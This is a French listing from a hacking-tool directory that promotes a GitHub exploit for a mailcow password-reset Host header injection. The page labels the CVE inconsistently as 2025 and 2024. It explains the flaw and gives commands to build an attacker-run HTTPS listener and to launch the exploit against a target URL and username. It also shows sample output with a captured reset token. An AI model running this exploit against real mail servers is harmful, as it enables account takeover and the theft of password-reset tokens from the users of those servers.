Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-25198 — Capture les jetons de réinitialisation de mot de passe lors d'attaques par injection d'en-tête Host sur Mailcow. | Kitploit
Outils/GitHubGitHub/enzocipher/cve-2025-25198
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

Capture les jetons de réinitialisation de mot de passe lors d'attaques par injection d'en-tête Host sur Mailcow.

Voir le dépôt
1il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-25198

mailcow: dockerized est une suite de messagerie/groupware open source basée sur Docker. Avant la version 2025-01a, une vulnérabilité dans la fonctionnalité de réinitialisation de mot de passe de mailcow permet à un attaquant de manipuler l'en-tête Host HTTP pour générer un lien de réinitialisation de mot de passe pointant vers un domaine contrôlé par l'attaquant. Cela peut conduire à une prise de contrôle du compte si un utilisateur clique sur le lien empoisonné.

Comment ça fonctionne ?

Configure un serveur HTTPS pour écouter toutes les requêtes et envoie une requête POST au site web avec l'en-tête Host contenant votre choisie. Vous pouvez également utiliser Burpsuite pour envoyer la requête et obtenir le jeton sur le serveur.

Fonctionnalités

  • Serveur HTTPS qui récupère le jeton de changement de mot de passe
  • Script d'exploitation qui attaque la vulnérabilité du site web.
  • Tout est corrigé et ne nécessite plus openssl pour fonctionner

Prérequis

  • Go 1.16 ou supérieur

Script Serveur

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

Script d'Exploitation

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optionnel >

Après avoir attendu un peu, le serveur affichera le jeton que vous pouvez utiliser :

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
Télécharger l’outil